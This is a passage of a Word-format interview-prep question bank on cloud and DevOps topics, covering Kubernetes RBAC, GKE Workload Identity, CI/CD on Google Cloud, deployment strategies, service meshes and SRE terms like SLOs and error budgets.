        <w:t xml:space="preserve">  resources: ["pods"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  verbs: ["get", "list"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. ClusterRole</w:t>
        <w:br/>
        <w:t>Same as Role, but cluster-wide scope</w:t>
        <w:br/>
        <w:t>Used for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PersistentVolumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster-wide resources</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. RoleBinding</w:t>
        <w:br/>
        <w:t>Connects a Role → User/Group/ServiceAccount</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>kind: RoleBinding</w:t>
        <w:br/>
        <w:t>subjects:</w:t>
        <w:br/>
        <w:t>- kind: ServiceAccount</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-sa</w:t>
        <w:br/>
        <w:t>roleRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  kind: Role</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: pod-reader</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. ClusterRoleBinding</w:t>
        <w:br/>
        <w:t>Binds a ClusterRole at cluster level</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How RBAC works (flow)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. User/Pod makes a request to API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. kube-apiserver checks authentication</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. RBAC system checks authorization:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Is this user allowed?</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. If yes → request allowed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. If no → request denied</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key RBAC concepts</w:t>
        <w:br/>
        <w:t>Verbs (actions)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * get</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * list</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * create</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * update</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * delete</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * watch</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * secrets</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>You want a pod to only read pods:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Create Role → pod-reader</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Create RoleBinding → attach to ServiceAccount</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod can list pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cannot delete or modify anything</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RBAC vs ABAC (old system)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RBAC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ABAC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Based on</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Roles</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Attributes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complex</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Standard</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deprecated</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of RBAC like a building:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Roles = job positions (admin, developer, viewer)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Permissions = what each job can access</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * RoleBinding = assigning a badge to a person</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use least privilege</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid giving cluster-admin unless necessary</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use Service Accounts for apps</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Separate roles per namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Regularly audit permissions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>RBAC in Kubernetes is a security model that regulates access to cluster resources by assigning permissions to roles and binding them to users, groups, or service accounts, ensuring controlled and least-privilege access to the Kubernetes API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1777. What is the difference between a Role and a ClusterRole in Kubernetes RBAC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Role grants permissions scoped to a single namespace and is paired with a RoleBinding; a ClusterRole grants permissions cluster-wide (or can be bound within a single namespace via a RoleBinding too), and is paired with a ClusterRoleBinding for cluster-wide access - use ClusterRole for cluster-scoped resources (like nodes) or when the same permission set needs to be reused across many namespaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1778. What is the difference between a RoleBinding and a ClusterRoleBinding in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A RoleBinding grants the permissions in a Role (or ClusterRole) to a user/group/service account within one specific namespace only; a ClusterRoleBinding grants the permissions in a ClusterRole across the entire cluster, all namespaces included - so the binding controls the scope of access even when it references the same underlying role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1779. What is GKE Workload Identity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Workload Identity lets a Kubernetes ServiceAccount in GKE impersonate a Google Cloud IAM service account without storing any exported JSON key on the cluster - pods use their Kubernetes ServiceAccount to obtain short-lived Google credentials automatically, which is the recommended, more secure alternative to mounting service account key files as secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1780. What is the difference between a stateful and a stateless application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A stateless application doesn't retain data between requests - any instance can handle any request, making it trivial to scale horizontally and replace; a stateful application persists data (in memory or on disk) tied to a specific instance, like a database, requiring stable identity, persistent storage, and careful handling during scaling or failover (which is exactly what Kubernetes StatefulSets are designed for).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1781. What is a secret (in the context of Kubernetes or cloud platforms)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A secret is a piece of sensitive data - passwords, API keys, TLS certificates, tokens - stored and transmitted separately from application code/config, typically encrypted at rest and access-controlled, rather than hardcoded or committed to source control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1782. What is autoscaling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Autoscaling automatically adjusts the number of running instances or Pods up or down based on real-time metrics like CPU, memory, or request rate, so capacity matches actual demand without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1783. What is the difference between horizontal and vertical scaling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Horizontal scaling adds more instances/Pods running in parallel to handle more load; vertical scaling increases the resources (CPU, memory) of an existing instance - horizontal scaling is generally preferred in cloud-native systems since it avoids a hard ceiling and single points of failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1784. What is a reverse proxy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A reverse proxy sits in front of backend servers and forwards client requests to them, commonly used for load balancing, TLS termination, caching, and hiding backend topology from clients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1785. What is TLS/SSL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: TLS (the successor to SSL) is a cryptographic protocol that encrypts data in transit between a client and server and verifies server identity via certificates, which is what makes HTTPS secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1786. What is a container registry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A container registry is a storage and distribution service for container images (like Docker Hub, Artifact Registry, or ECR) where images are pushed after a build and pulled from when deploying.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1787. What is Artifact Registry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Artifact Registry is Google Cloud's managed service for storing and managing container images, language packages (npm, Maven, Python), and other build artifacts, with per-repository IAM, vulnerability scanning, and regional replication - it's the successor to the older Container Registry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1788. What is Cloud Build, and what does a typical Cloud Build workflow look like?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Build is Google Cloud's managed CI/CD service that executes build steps defined in a cloudbuild.yaml (or Dockerfile) as a sequence of containerized steps. A typical workflow: a trigger fires on a git push, Cloud Build checks out the code, builds a container image, runs tests and vulnerability scans, pushes the image to Artifact Registry, then deploys it (to Cloud Run, GKE, or via Cloud Deploy) - each step running in its own container for isolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1789. What is Cloud Deploy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Deploy is Google Cloud's managed continuous delivery service for orchestrating progressive, multi-stage rollouts (dev to staging to prod) to GKE or Cloud Run, handling promotion approvals, canary/rolling delivery strategies, and rollback, on top of artifacts already built (typically by Cloud Build).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1790. How does Cloud Armor work to protect a service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Armor is a Google Cloud WAF and DDoS protection service that attaches to an external HTTP(S) Load Balancer and evaluates incoming requests against configured rules - IP allow/deny lists, geo-based restrictions, preconfigured WAF rules (SQLi, XSS), and rate limiting - blocking or throttling malicious traffic before it ever reaches your backend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1791. What is a rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A rollback reverts a deployment to its previous known-good version after a bad release, typically by redeploying the prior image/version or, in Kubernetes, using the Deployment's revision history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1792. What is a blue-green deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Blue-green deployment runs two identical production environments (blue = current, green = new); traffic is switched all at once from blue to green after the new version is verified, allowing an instant rollback by switching traffic back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1793. What is a canary deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A canary deployment gradually shifts a small percentage of production traffic to a new version first, monitoring for errors before progressively increasing traffic, limiting the blast radius of a bad release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1794. What is a service mesh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A service mesh is an infrastructure layer that manages communication between microservices inside a cluster, handling things like traffic routing, security, and observability without changing application code—especially in systems like Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A service mesh controls how services talk to each other, not what the services do.</w:t>
        <w:br/>
        <w:t>It adds a dedicated network layer for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service-to-service communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic control</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why service mesh is needed</w:t>
        <w:br/>
        <w:t>In microservices architectures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dozens or hundreds of services communicate</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Each service needs retries, logging, security, metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Adding this logic in every app is complex and error-prone</w:t>
        <w:br/>
        <w:t>Service mesh solves this by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Moving networking logic out of application code</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Managing it centrally at infrastructure level</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (high level)</w:t>
        <w:br/>
        <w:t>A service mesh introduces two main components:</w:t>
        <w:br/>
        <w:t>1. Data plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs next to each service (often as a sidecar container)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: Envoy proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles actual traffic between services</w:t>
        <w:br/>
        <w:t>2. Control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configures and manages the proxies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Defines policies (routing, security, telemetry)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow</w:t>
        <w:br/>
        <w:t>Service A → Sidecar Proxy → Sidecar Proxy → Service B</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t>1. Traffic management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic splitting (canary deployments)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Circuit breaking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retries and timeouts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * mTLS (mutual TLS) encryption</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service identity authentication</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Zero-trust networking</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Metrics (latency, errors, throughput)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributed tracing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Logs between services</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular service mesh tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Linkerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Consul Connect</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS App Mesh</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Service mesh vs Kubernetes networking</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes (basic)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service Mesh</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traffic control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic service routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Advanced (retries, canary, A/B testing)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>mTLS, identity-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Observability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic logs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full tracing + metrics</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a city:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services = buildings</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes networking = roads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service mesh = traffic control system with police, signals, and cameras managing all movement</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use service mesh</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large microservices architectures</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Need for advanced traffic control</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strong security requirements (zero trust)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Complex observability needs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Downsides</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Added complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Performance overhead (extra proxy layer)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Operational learning curve</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A service mesh is an infrastructure layer that manages service-to-service communication in microservices architectures, providing features like traffic routing, security (mTLS), load balancing, and observability through sidecar proxies and a centralized control plane without requiring changes to application code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1795. How does Istio work as a service mesh - what is the basic request/traffic flow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Istio injects a sidecar Envoy proxy into every Pod, and all inbound/outbound traffic for that Pod is transparently routed through its sidecar rather than going directly between application containers. The control plane (istiod) pushes routing rules, mTLS certificates, and policy configuration to every sidecar, so when Service A calls Service B, the request actually goes app-A to sidecar-A to sidecar-B to app-B, with the sidecars handling encryption, retries, load balancing, and telemetry along the way - all without the application code being aware of it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1796. What is observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Observability is the ability to understand a system’s internal state from external signals such as logs, metrics, traces, and events. It helps teams debug unknown issues, not just monitor known failures.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Observability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Q1797. What is the difference between SLA, SLI, and SLO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An SLI (Service Level Indicator) is a measured metric like latency or availability; an SLO (Service Level Objective) is the internal target for that metric (e.g. 99.9% uptime); an SLA (Service Level Agreement) is the external, often contractual, commitment to customers, usually with penalties if missed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1798. What is an error budget?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An error budget is the allowed amount of unreliability (100% minus the SLO) a service can spend before teams must pause feature releases and prioritize reliability work instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1799. What is a runbook?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A runbook is a documented, step-by-step procedure for diagnosing and resolving a specific operational issue, used during incidents so response doesn't depend on one person's memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1800. What is version control?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Version control is a system (like Git) that tracks changes to files over time, letting multiple people collaborate, review history, branch, and revert changes safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1801. What is a Git branch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Git branch is an independent line of development - a movable pointer to a commit - that lets you work on changes in isolation from the main codebase until they're ready to merge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
